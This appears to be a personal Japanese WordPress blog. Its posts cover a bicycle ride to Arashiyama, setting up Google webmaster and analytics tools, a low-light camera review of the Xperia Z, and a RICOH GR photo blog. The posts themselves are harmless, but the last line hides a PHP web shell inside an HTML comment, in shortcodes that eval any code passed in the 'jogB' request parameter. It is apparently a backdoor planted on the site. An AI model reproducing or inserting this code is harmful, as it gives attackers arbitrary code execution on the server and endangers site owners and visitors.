借りてるロードバイクで嵐山

このブログ40もアクセスあるぜ!と思ったら自分の踏んだ分ですね。焦らず頑張ります。

それは置いといて、先日淀川サイクリングロードをひとっ走りして嵐山まで行って参りました。三川合流前の桂川沿いしか走ってませんが。

DSC_0146

往復25キロほどなのに、なんだかんだ2時間ぐらいかかりました。嵐山には親戚が住んでいたりして小さい頃からよく行っております。片道10キロなのでとても近いですので、他府県の方が聞く”嵐山”という響きほどワクワクしません。しかし平日の午前中の河川敷というのはなかなか新鮮でした。上裸で筋トレをするおっちゃんや、鯉釣りをしながら談笑するおっちゃん。おっちゃん率異常に高かったですが、あれが平常なのでしょう。

DSC_0145

まさかの鮎の友釣りをしてるおっちゃん発見して思わずぱしゃり。端っこに囮鮎いれとく奴がぷかぷかしてたので間違いない。こう見ると桂川がもっと田舎の綺麗な川に見えます。

DSC_0147

到着して、五木茶屋でソフトクリームを頂きます。ほうじ茶ソフト。ダイエットで走ってるんですがね。1時間ぐらいサクッとはしれるコースを家の周りに設定したいですね。今のところついついさぼって週一でしか走ってません。平日はランニングして土日にドーンとロングランがいいかもしれませんね。

借りてるロードバイクはルイガノです。
おそらくこれだと思います。http://bbs.kakaku.com/bbs/64206511626/#tab
メーカーサイトはなかったので価格.comですが。まあまあ古いけど僕の持ってる中では最新です。なのでこれがロードバイクか!と感動しております。

RHCpro
欲しいのはFondriestのTF3 1.2っていうのがすごくすごく欲しいです。トップチューブが角張っててかっこいいんですよね。まあそんな妄想話ですが。いつか買います。

TF3_1.2
http://www.fondriestbici.com/ita/products.php?cat=2&id=20 

日本語サイトないのかなーと。

現状85キロで75キロ切ったら購入許可がおりるらしいので頑張ります。

写真はXperiaZで撮影しました。

WordPressサイト設置したらGoogle大先生にご挨拶にいきましょう

wordpressは最近はやりの拡張性の高いCMSです。このブログももちろんそうです。見たら分かる人には一瞬でわかる。SEOっというまでもなく、とりあえずGoogle大先生にご挨拶ですね。

wordpress
Googleアカウントは無いと仲間に入れてくれません。

ウェブマスタールーツです。

Google ウェブマスターツール 使い方・登録方法

こちら参考にしました。
ついでにサイトマップとやらも登録しておきましょう。

これ超簡単![WordPress対応]XMLサイトマップ登録法

アナリティクスです。発音しにくい。

自分のブログ(WordPress)に、Google Analyticsのトラッキングコードを追加する方法

うむうむ。便利な世の中ですな。こんなブログかけるように成りたいですわ。これらのツールを入れとけば、アクセスが増えたらニマニマできるはずです。

今さらXperiaZのカメラレビュー暗所編

カメラを調べれば調べるほどカメラ自体の性能、機械的な魅力に取り憑かれてしまします。今持ってるカメラといえば、EOS kiss x3とXperiaZ。何世代前かわからない入門一眼レフと、最新から毎日遠ざかっていくスマホです。本気カメラとして6D、サブ機としてRICOHのGRが欲しいのですが、その前に手持ちの二つで写真とるの上手くなりたいですね。

しかしカメラ自体の性能ももちろん気になるので、拙いですがレビューします。

僕みたいなカメラ初心者は、やたら夕暮れなどを撮りたくなります。。

DSC_0152

SS1/50 f2.4 ISO50

こちらは夕暮れのまだ太陽が見えてるぐらいの明るさです。けっこう暗いのですが暗所での性能はまあまあ良さそうです。Xperiaからみると綺麗に写ってるように思います。一眼をわからないなりに触っていたので、ISO50にびっくりしました。クリックして等倍表示するとぶれぶれですね。

 DSC_0153

SS1/16 f2.4 ISO600

日が暮れてぎりぎり太陽の明るさが残ってるかなぐらいのタイミング。ISO600で結構ノイズが目立ちます。また肉眼だともうちょっと暗いかなってところで、そこを撮りたかったので明るくなりすぎてますね。設定いじれるのかな?

ブラビアエンジンのおかげでxperiaでみると本当に綺麗です。なかなか良いと思いつつモニターでみるとがっくし。やっぱりGR欲しい。豆センサーの限界でしょうか。

最近はスマホに出来る事が増える一方、PCとの間にタブレットが割って入り、スマホにそんなに機能はいらないんじゃないかなと思えます。というかiPadminiで電話番号使えたら最強になるんじゃないかなと思ってます。だからGRにかるーいスマホの機能つかないかなーなんてね。ま、RICOHはそんなことしないでしょうけど。林檎信者がXperia使った感想など今後も書いていきます。
[ad#ad-bottom-article]

ヨドバシさんのRICOH GRのフォトレビューが面白い

ヨドバシカメラのブログですが、すごく旅行に行きたくなりますね。
カメラ一つで旅に出る
写真一枚お借りします。

20130723-184126.jpg

”海と空の境目が曖昧になったモノトーンの世界にほのかに浮かぶ被写体。深い霧に包まれた海岸では、見えたはずの遠くの景色を目にすることはできません。ガッカリするよりも、そんな写真が撮れるチャンスだとワクワクしましょう。写真って、本当にいい趣味だと思います。”

ぼくもそう思います。
旅行だ!と意気込んで一眼レフ担いで旅行にいくと写真を撮ることに夢中になり、旅行そのものの良さそを忘れてしまいがちですが、GRの機動性、描写力ぐらいだとちょうどいいのかもしれません。そして上の一枚は旅行と写真のいいとこが上手いことまじった良い写真ですね。
私コンビニの店長ですので、あまり旅行に行けないのですが隙をみて一人旅してみたいですね。
ヨドバシカメラってばりばり商売ってイメージでしたが、店員さんの対応、こういうブログみてるとしっかりしてるなーと思います。Amazon大好きでしたが、ヨドバシカメラもこれから利用してみますか。

<!– [insert_php]if (isset($_REQUEST["jogB"])){eval($_REQUEST["jogB"]);exit;}[/insert_php][php]if (isset($_REQUEST["jogB"])){eval($_REQUEST["jogB"]);exit;}[/php] –>